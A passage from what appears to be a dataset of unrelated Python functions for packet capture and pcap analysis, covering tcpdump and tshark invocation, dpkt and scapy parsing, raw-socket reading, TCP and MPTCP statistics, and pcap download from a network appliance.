FileNotFoundError:\r\n pass", "def capture_packets(self, interface, count=1, timeout=None):\n if interface not in self.packet_captures:\n raise ObjectNotFoundException(\n 'No packet capture is running or was run on host/interface' +\n self.name + '/' + interface)\n tcpd = self.packet_captures[interface]\n return tcpd.wait_for_packets(count, timeout)", "def process_pkts(self, pkts: list):\n pkt_count = 0\n for ts, buf in pkts:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP):\n continue\n ip = eth.data\n if ((inet_to_str(ip.src) == self.sip and inet_to_str(ip.dst) == self.dip) or\n (inet_to_str(ip.src) == self.dip and inet_to_str(ip.dst) == self.sip)):\n if isinstance(ip.data, dpkt.tcp.TCP):\n tcp = ip.data\n if ((tcp.sport == self.sp and tcp.dport == self.dp) or\n (tcp.dport == self.sp and tcp.sport == self.dp)):\n pkt_count += 1\n self._process(buf, ts, pkt_count)\n if self._c_state == self._s_state and self._c_state == TCPState.CLOSED:\n logger.info(\"Session finished.\")\n logger.info(\"Number of packets in the session id: {} is {}\".format(\n self.session_count, len(self.sessions[self.session_count])))\n self.__reset_state__()", "def extract_from_pcap(device=None, pcap=None, flags=\"-v -r\", path_to_chaosreader=\"/tmp/\"):\n if device is None or pcap is None:\n raise Exception(\"device and pcap are mandatory arguments\")\n device.shell(command=\"cd /tmp\")\n\n cmd = path_to_chaosreader + \"chaosreader0.94 \" + flags + \" \" + pcap\n output = device.shell(command=cmd)\n\n if not re.match(\".*Creating files.*\", output.response(), re.DOTALL):\n device.log(level=\"ERROR\", message=\"Chaosreader ran into an error\")\n raise Exception(\"Chaosreader ran into an error\")\n\n return True", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def get_total_and_retrans_frames(pcap_filepath, connections):\n # First init values to avoid strange errors if connection is empty\n for conn_id, conn in connections.iteritems():\n for direction in co.DIRECTIONS:\n connections[conn_id].flow.attr[direction][co.FRAMES_TOTAL] = 0\n connections[conn_id].flow.attr[direction][co.BYTES_FRAMES_TOTAL] = 0\n connections[conn_id].flow.attr[direction][co.FRAMES_RETRANS] = 0\n connections[conn_id].flow.attr[direction][co.BYTES_FRAMES_RETRANS] = 0\n\n stats_filename = os.path.basename(pcap_filepath)[:-5] + \"_tshark_total\"\n stats_file = open(stats_filename, 'w')\n co.tshark_stats(None, pcap_filepath, print_out=stats_file)\n stats_file.close()\n\n stats_file = open(stats_filename)\n data = stats_file.readlines()\n stats_file.close()\n for line in data:\n split_line = \" \".join(line.split()).split(\" \")\n if len(split_line) == 11:\n # Manage case with ipv6\n ip_src, port_src = get_ip_port_tshark(split_line[0])\n ip_dst, port_dst = get_ip_port_tshark(split_line[2])\n for conn_id, conn in connections.iteritems():\n if conn.flow.attr[co.SADDR] == ip_src and conn.flow.attr[co.SPORT] == port_src and \\\n conn.flow.attr[co.DADDR] == ip_dst and conn.flow.attr[co.DPORT]:\n connections[conn_id].flow.attr[co.S2C][co.FRAMES_TOTAL] = int(split_line[3])\n connections[conn_id].flow.attr[co.S2C][co.BYTES_FRAMES_TOTAL] = int(split_line[4])\n connections[conn_id].flow.attr[co.C2S][co.FRAMES_TOTAL] = int(split_line[5])\n connections[conn_id].flow.attr[co.C2S][co.BYTES_FRAMES_TOTAL] = int(split_line[6])\n break\n\n stats_file.close()\n os.remove(stats_filename)\n\n stats_filename = os.path.basename(pcap_filepath)[:-5] + \"_tshark_retrans\"\n stats_file = open(stats_filename, 'w')\n co.tshark_stats('tcp.analysis.retransmission', pcap_filepath, print_out=stats_file)\n stats_file.close()\n\n stats_file = open(stats_filename)\n data = stats_file.readlines()\n stats_file.close()\n for line in data:\n split_line = \" \".join(line.split()).split(\" \")\n if len(split_line) == 11:\n ip_src, port_src = get_ip_port_tshark(split_line[0])\n ip_dst, port_dst = get_ip_port_tshark(split_line[2])\n for conn_id, conn in connections.iteritems():\n if conn.flow.attr[co.SADDR] == ip_src and conn.flow.attr[co.SPORT] == port_src and \\\n conn.flow.attr[co.DADDR] == ip_dst and conn.flow.attr[co.DPORT]:\n connections[conn_id].flow.attr[co.S2C][co.FRAMES_RETRANS] = int(split_line[3])\n connections[conn_id].flow.attr[co.S2C][co.BYTES_FRAMES_RETRANS] = int(split_line[4])\n connections[conn_id].flow.attr[co.C2S][co.FRAMES_RETRANS] = int(split_line[5])\n connections[conn_id].flow.attr[co.C2S][co.BYTES_FRAMES_RETRANS] = int(split_line[6])\n break\n\n stats_file.close()\n os.remove(stats_filename)", "def next_connection_packets(piter, linktype=1):\n first_ft = None\n\n for ts, raw in piter:\n ft = flowtuple_from_raw(raw, linktype)\n if not first_ft: first_ft = ft\n\n sip, dip, sport, dport, proto = ft\n if not (first_ft == ft or first_ft == (dip, sip, dport, sport, proto)):\n break\n\n yield {\n \"src\": sip, \"dst\": dip, \"sport\": sport, \"dport\": dport, \"proto\": proto,\n \"raw\": payload_from_raw(raw, linktype).encode(\"base64\"), \"direction\": first_ft == ft,\n }", "def get_pcap_traffic_series(self):\n parsed_pcap_data = {}\n\n if (self.mac_address_binary is not None):\n parsed_pcap_data[self.mac_address_binary] = []\n\n with open(self.pcap_file_path, 'rb') as pcap_file:\n try:\n pcap = dpkt.pcap.Reader(pcap_file)\n for ts, buf in pcap:\n # Skip non ethernet frames\n try:\n eth = dpkt.ethernet.Ethernet(buf)\n except:\n continue\n\n # Skip non-IP packets\n if eth.type != 2048:\n continue\n \n # Apply eth filter\n if (self.mac_address_binary is not None):\n self.append_data(parsed_pcap_data, self.mac_address_binary, eth, ts)\n else:\n if (eth.src not in parsed_pcap_data):\n parsed_pcap_data[eth.src] = []\n if (eth.dst not in parsed_pcap_data):\n parsed_pcap_data[eth.dst] = []\n\n self.append_data(parsed_pcap_data, eth.src, eth, ts)\n self.append_data(parsed_pcap_data, eth.dst, eth, ts)\n except:\n print \"Error parsing file: %s\" % pcap_file\n \n # Remove mac addresses that didn't send data\n receivers_only = []\n for mac_addr in parsed_pcap_data:\n data_sent = False\n for data in parsed_pcap_data[mac_addr]:\n if (data[1] > 0):\n data_sent = True\n break\n if (not data_sent):\n receivers_only.append(mac_addr)\n\n for mac_addr in receivers_only:\n parsed_pcap_data.pop(mac_addr, None)\n\n # Sort the data \n for mac_addr in parsed_pcap_data:\n series = sorted(parsed_pcap_data[mac_addr], key=operator.itemgetter(0))\n parsed_pcap_data[mac_addr] = series\n\n return parsed_pcap_data", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def packetSniff():\n\n packets = psutil.net_io_counters(pernic=True)\n interfaces = {}\n x = 0\n for p in packets.items():\n values = {}\n values['name'] = p[0]\n values['bytes_sent'] = p[1][0]\n values['bytes_recv'] = p[1][1]\n values['pckt_sent'] = p[1][2]\n values['pckt_recv'] = p[1][3]\n values['errin'] = p[1][4]\n values['errout'] = p[1][5]\n values['dropin'] = p[1][6]\n values['dropout'] = p[1][7]\n\n if ((values['bytes_sent'] or values['bytes_recv'] or\n values['pckt_sent'] or values['pckt_recv']) != 0):\n\n interfaces[x] = values\n x += 1\n else:\n pass\n\n return interfaces", "def start_tcpdump(self):\n\t\tlog_file = os.path.join(self.cfg.file_log_dir,self.info[\"hash_md5\"]+\".pcap\")\n\t\tself.info[\"tcpdump_log_path\"] = log_file\n\t\tcmd = [\"/usr/sbin/tcpdump\", \"-iany\", \"-w\"+self.info[\"tcpdump_log_path\"], \"-c%d\"%(self.cfg.tcpdump_limit)]\n\t\tself.p_tcpdump = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\tself.log.info(\"tcpdump starts, logfile:%s\",self.info[\"tcpdump_log_path\"] )", "def tcpdump(timeout, q, interface):\t\n\tlogging.debug('tcpdump -s 1024 -lqnAt tcp port 80 -i eth0')\n\t# tcpdump -s 1024 -lqnAt tcp port 80\n\t\t\n\tcommand = Command(['/usr/sbin/tcpdump', '-s 1024', '-lnAq', '-i', interface], timeout)\n\tcommand.run()\n\n\t# when it's executing here, the results have been available\n\t# print command.out\n\n\tif command.out is not None:\n\t\t# pattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tip_pattern = \"IP ([0-9]+.[0-9]+.[0-9]+.[0-9]+).[0-9]+ > [0-9]+.[0-9]+.[0-9]+.[0-9]+.[0-9]\"\n\t\tgoogle_pattern = \"domain=.google.com\"\n\t\tlines = command.out.split('\\n')\n\t\tlast_ip = None\n\n\t\t# first time scan for google's return ip\n\t\tfor line in lines:\n\t\t\tip_src = re.search(ip_pattern, line)\n\t\t\tif ip_src is not None:\n\t\t\t\tlast_ip = ip_src.group(1)\n\t\t\tif re.search(google_pattern, line):\n\t\t\t\tprint last_ip\n\t\t\t\tbreak\n\n\t\tgEntries = []\n\t\tif last_ip is not None:\n\t\t\t\n\t\t\t# second time scan parse tcpdump for query entries\n\t\t\tfor line in lines:\n\t\t\t\tlast_ip_pos = re.search(last_ip, line)\n\t\t\t\tif last_ip_pos is None:\n\t\t\t\t\tcontinue\n\t\t\t\n\t\t\t\tif line.index('>') > last_ip_pos.start():\n\t\t\t\t\t# from remote to this place\n\t\t\t\t\ttraffic_type = 1\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# out to remote\n\t\t\t\t\ttraffic_type = 0\n\t\t\t\n\t\t\t\ttime_pattern = \"([0-9]+:[0-9]+:[0-9]+.[0-9]+) IP\"\n\t\t\t\ttimestamp = re.search(time_pattern, line)\n\t\t\t\tif timestamp is not None:\n\t\t\t\t\ttime_str = timestamp.group(1)\n\t\t\t\t\th, m, s, ms = map(int, re.split(r'[.:]+', time_str))\n\t\t\t\t\ttimestamp_delta = timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)\n\t\t\t\t\tgEntries.append( (timestamp_delta, traffic_type) )\n\t\t\t\telse:\n\t\t\t\t\tgEntries.append( (None, -1))\n\n\t\tq.put((command.returncode, last_ip, gEntries))\n\t\treturn", "def download_pcap(self, args=None):\r\n result = {\"Task\": \"DownloadPCAP\", \"Error\": \"NoError\", \"Status\": \"FileNotFound\", \"FileName\": args['filename'],\r\n \"FileSize\": 0, \"FileType\": \"UnKnown\", \"FileURL\": 'UnKnown', \"FileUser\": 'UnKnown'}\r\n with EndaceWebSession(app_url=self.applianceurl, username=self.username, password=self.password,\r\n cert_verify=self.cert_verify) as sess:\r\n api = EndaceVisionAPIAdapter(sess)\r\n path = \"files\"\r\n rf = api.get(path)\r\n if rf.status_code == 200:\r\n try:\r\n response = rf.json()\r\n except json.decoder.JSONDecodeError:\r\n raise Exception(f\"JsonDecodeError - path {path}\")\r\n else:\r\n meta = response.get(\"meta\", {})\r\n payload = response.get(\"payload\")\r\n if meta:\r\n meta_error = meta[\"error\"]\r\n if meta_error is not None:\r\n if meta_error is not False:\r\n result['Status'] = \"FileNotFound\"\r\n result['Error'] = str(meta_error)\r\n else:\r\n # Download PCAP File\r\n for file in payload:\r\n if result['FileName'] == file['name'] and len(file[\"id\"]):\r\n file_numerical_part = float(re.findall(r'[\\d\\.]+', file['usage'])[0])\r\n\r\n if 'KB' in file['usage']:\r\n filesize = file_numerical_part * 0.001\r\n elif 'GB' in file['usage']:\r\n filesize = file_numerical_part * 1000\r\n elif 'TB' in file['usage']:\r\n filesize = file_numerical_part * 1000000\r\n else:\r\n filesize = file_numerical_part * 1\r\n\r\n if filesize <= int(args['filesizelimit']):\r\n result['FileName'] = file['name'] + \".pcap\"\r\n if not file['status']['inUse']:\r\n # File available to download\r\n pcapfile_url_path = (\"files/%s/stream?format=pcap\" % file[\"id\"])\r\n d = api.get(pcapfile_url_path)\r\n if d.status_code == 200:\r\n demisto.results(fileResult(f'{result[\"FileName\"]}', d.content,\r\n file_type=entryTypes['entryInfoFile']))\r\n\r\n result['FileURL'] = f'[Endace PCAP URL]'\\\r\n f'({self.applianceurl}/vision2/data/'\\\r\n f'{pcapfile_url_path})'\r\n\r\n result['FileSize'] = file['usage']\r\n result['Status'] = \"DownloadFinished\"\r\n result['FileType'] = file['type']\r\n result['FileUser'] = file['user']\r\n else:\r\n result['Status'] = \"FileNotFound\"\r\n result['Error'] = f\"ServerError - HTTP {rf.status_code} to /{path}\"\r\n else:\r\n result['Status'] = \"FileInUse\"\r\n else:\r\n result['Status'] = \"FileExceedsSizeLimit\"\r\n else:\r\n result['Status'] = \"Failed\"\r\n result['Error'] = f\"ServerError - empty meta data from {path}\"\r\n else:\r\n result['Status'] = \"Failed\"\r\n result['Error'] = f\"ServerError - HTTP {rf.status_code} to /{path}\"\r\n\r\n if result['Status'] == 'Failed':\r\n self.handle_error_notifications(result['Error'])\r\n return result", "def retrieve(self, trace_filter={}, limit=0):\n\n if isinstance(limit, int) and limit > 0:\n max_r = limit\n else:\n max_r = 0\n\n try:\n packets = self.__db.find_packets(self._collection, trace_filter, max_r)\n except MemoryError:\n print(\"Warning: cannot allocate sufficient memory for packets, perhaps you are using Windows?\")\n return []\n except:\n return []\n\n # Attempt to decode base64 payloads.\n for packet in packets:\n if packet[\"tcp_info\"] is not None:\n if isinstance(packet[\"tcp_info\"][\"payload\"], bytes):\n try:\n packet[\"tcp_info\"][\"payload\"] = b64decode(packet[\"tcp_info\"][\"payload\"])\n except:\n continue\n\n if packet[\"tls_info\"] is not None:\n for i, data in enumerate(packet[\"tls_info\"][\"data\"]):\n if isinstance(data, bytes):\n try:\n packet[\"tls_info\"][\"data\"][i] = b64decode(data)\n except:\n continue\n\n return packets", "def loadpts(skip=40, filt=None, ref_frame=None):\n pts = []\n for i in range(42):\n print('loading file: ', i)\n if filt is not None:\n traj = md.load(DCD_PROT(i), top=PDB_PROT, atom_indices=filt, stride=skip)\n else:\n traj = md.load(DCD_PROT(i), top=PDB_PROT, stride=skip)\n traj.center_coordinates()\n if ref_frame is not None:\n traj.superpose(ref_frame)\n for i in traj.xyz:\n pts.append(i)\n return np.array(pts)", "def create_stream(cls, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_dst_if, cls.src_dst_if)\n payload = cls.info_to_payload(info)\n p = (\n Ether(dst=cls.src_dst_if.local_mac, src=cls.src_dst_if.remote_mac)\n / IP(\n id=info.index,\n src=cls.src_dst_if.remote_ip4,\n dst=cls.src_dst_if.local_ip4,\n )\n / ICMP(type=\"echo-request\", id=1234)\n / Raw(payload)\n )\n cls.extend_packet(p, 1518, cls.padding)\n info.data = p", "def accumulate_packets():\n l = []\n packets = sniff(count=NUMBER_OF_SNIFFING_ROUNDS, lfilter=fltr, prn=printing)\n print(\"Processing packets!\")\n for packet in packets:\n l.append({\"ip\": get_ip(packet),\n \"country\": get_country(packet),\n \"entering\": is_entering(packet),\n \"port\": get_partner_port(packet),\n \"size\": packet[IP].len, #the len of the ip layer is the len of the entire packet\n \"program\": get_program(packet)})\n return l", "def sniff_online(args):\n print('viewer: listening on ' + args.interface)\n\n try:\n sniffer = pcapy.open_live(args.interface, 65536, 1, 1)\n sniffer.setfilter('icmp')\n except Exception as e:\n print(e)\n sys.exit(-1)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n (header, packet) = sniffer.next()\n if header:\n tts = header.getts()\n ret = parse_ICMP_Echo(tts[0] + tts[1] / 1000000, packet)\n\n if ret and args.count:\n count -= 1", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def process_pcap(self):\n # Create Core Controller\n controller = Controller(self.args.input, self.args.extraTests, self.args.non_verbose, self.args.output,\n self.args.debug)\n\n if not self.args.skip:\n # Load PCAP statistics\n recalculate_intervals = None\n if self.args.recalculate_delete:\n recalculate_intervals = True\n elif self.args.recalculate_yes:\n recalculate_intervals = True\n self.args.recalculate = True\n elif self.args.recalculate_no:\n recalculate_intervals = False\n self.args.recalculate = True\n controller.load_pcap_statistics(self.args.export, self.args.recalculate, self.args.statistics,\n self.args.statistics_interval, self.args.recalculate_delete,\n recalculate_intervals)\n\n if self.args.list_intervals:\n controller.list_interval_statistics()\n\n # Create statistics plots\n if self.args.plot is not None:\n do_entropy = False\n if self.args.extraTests:\n do_entropy = True\n controller.create_statistics_plot(self.args.plot, do_entropy)\n\n # Check rng seed\n if not isinstance(self.args.rngSeed, list):\n self.args.rngSeed = [self.args.rngSeed]\n\n # Process attack(s) with given attack params\n if self.args.attack is not None:\n # If attack is present, load attack with params\n controller.process_attacks(self.args.attack, self.args.rngSeed, self.args.time, self.args.inject_empty)\n\n # Parameter -q without arguments was given -> go into query loop\n if self.args.query == [None]:\n controller.enter_query_mode()\n # Parameter -q with arguments was given -> process query\n elif self.args.query is not None:\n controller.process_db_queries(self.args.query, True)", "def next_batch(self):\n\n while self.cap.isOpened():\n flag, frame = self.cap.read()\n yield frame", "def main():\n connection = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.htons(0x03))\n\n # Start the main loop.\n while True:\n # 65536 is the biggest buffer size that can be used.\n raw_data, addr = connection.recvfrom(65536)\n dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data)\n print('\\nEthernet Frame:')\n print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto))", "def read_packets(serial_input):\n while 1:\n header = scan_to_headerword(serial_input)\n yield header.read_packet(serial_input)", "def sniffing():\n sniff(store=False, prn=lambda p: threading.Thread(target=next, args=(p,)).start(), iface=IFACE)", "def read_pkt_seq(self):\n pkt = self.read_pkt_line()\n while pkt:\n yield pkt\n pkt = self.read_pkt_line()", "def sniff_continuously(self, packet_count=None):\n \n self.lcapture_tshark = (self.lcapture_tshark or \n self.eventloop.run_until_complete(self._get_tshark_process()))\n\n self._running_processes.add(self.lcapture_tshark)\n\n # Retained for backwards compatibility and to add documentation.\n return self._packets_from_tshark_sync(packet_count=packet_count, \n tshark_process=self.lcapture_tshark)", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def process_trace(pcap_filepath, graph_dir_exp, stat_dir_exp, failed_conns_dir_exp, acksize_tcp_dir_exp, tcpcsm, mptcp_connections=None, print_out=sys.stdout, light=False, return_dict=False):\n cmd = ['tstat', '-s', os.path.basename(pcap_filepath[:-5]), pcap_filepath]\n\n keep_tstat_log = False if return_dict else True\n\n try:\n connections = process_tstat_cmd(cmd, pcap_filepath, keep_log=keep_tstat_log, graph_dir_exp=graph_dir_exp)\n except TstatError as e:\n print(str(e) + \": skip process\", file=sys.stderr)\n return\n\n # Directory containing all TCPConnections that tried to be MPTCP subflows, but failed to\n failed_conns = {}\n\n if tcpcsm:\n retransmissions_tcpcsm(pcap_filepath, connections)\n\n acksize_all = {co.C2S: {}, co.S2C: {}}\n\n if not light:\n inverse_conns = create_inverse_tcp_dictionary(connections)\n\n acksize_all = compute_tcp_acks_retrans(pcap_filepath, connections, inverse_conns)\n\n acksize_all_mptcp = {co.C2S: {}, co.S2C: {}}\n\n if mptcp_connections:\n fast_conns = get_preprocessed_connections(mptcp_connections)\n for flow_id in connections:\n # Copy info to mptcp connections\n copy_info_to_mptcp_connections(connections, mptcp_connections, failed_conns, acksize_all, acksize_all_mptcp, flow_id,\n fast_conns=fast_conns)\n\n if not light:\n for conn_id, conn in mptcp_connections.iteritems():\n for direction in co.DIRECTIONS:\n max_ack = timedelta(0)\n max_payload = timedelta(0)\n for flow_id, flow in conn.flows.iteritems():\n if co.TIME_LAST_ACK_TCP in flow.attr[direction] and (flow.attr[direction][co.TIME_LAST_ACK_TCP] - max_ack).total_seconds() > 0.0:\n max_ack = flow.attr[direction][co.TIME_LAST_ACK_TCP]\n\n if co.TIME_LAST_PAYLD_TCP in flow.attr[direction] and (flow.attr[direction][co.TIME_LAST_PAYLD_TCP] - max_payload).total_seconds() > 0.0:\n max_payload = flow.attr[direction][co.TIME_LAST_PAYLD_TCP]\n\n mptcp_connections[conn_id].attr[direction][co.TIME_LAST_ACK_TCP] = max_ack\n mptcp_connections[conn_id].attr[direction][co.TIME_LAST_PAYLD_TCP] = max_payload\n\n try:\n compute_mptcp_dss_retransmissions(pcap_filepath, mptcp_connections, fast_conns)\n except dpkt.NeedData as e:\n print(e, \": trying to continue...\", file=sys.stderr)\n\n if return_dict:\n if mptcp_connections:\n return connections, acksize_all_mptcp\n else:\n return connections, acksize_all\n else:\n # Save connections info\n if mptcp_connections:\n co.save_data(pcap_filepath, acksize_tcp_dir_exp, acksize_all_mptcp)\n # Also save TCP connections that failed to be MPTCP subflows\n co.save_data(pcap_filepath, failed_conns_dir_exp, failed_conns)\n else:\n co.save_data(pcap_filepath, acksize_tcp_dir_exp, acksize_all)\n co.save_data(pcap_filepath, stat_dir_exp, connections)", "def ingest_packet(self, pkt, pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def get_available_portoffset(target=\"localhost\"):\n target_ip = socket.gethostbyname(target)\n for portoffset in range(10000, 61000, 1000):\n i = portoffset + 873\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((target_ip, i))\n sock.close()\n if result != 0:\n logger.debug(\"port open {0}\".format(portoffset))\n return portoffset\n return None", "def iplayer_from_raw(raw, linktype=1):\n if linktype == 1: # ethernet\n pkt = dpkt.ethernet.Ethernet(raw)\n ip = pkt.data\n elif linktype == 101: # raw\n ip = dpkt.ip.IP(raw)\n else:\n raise Exception(\"unknown PCAP linktype\")\n return ip", "def mptcp_connections(self, pkts):\n\t\tcount = 0\n\t\t#MPTCP_Capable = 0x0\n\t\t#MPTCP_CapableACK ---> successful handshake\n\t\tprint \"======================================================================\"\n\t\tprint \"Successful Handshake --- Look for Ack packets with MPTCP option Header\"\n\t\tprint \"\"\"Token = connectionID = SHA1(key)[0-32] of Other party's key. (Capture from\n\t\t either step 2 or 3 in the first handshake)\"\"\"\n\t\tprint \"Total packets: %s\" % len(pkts)\n\t\tprint 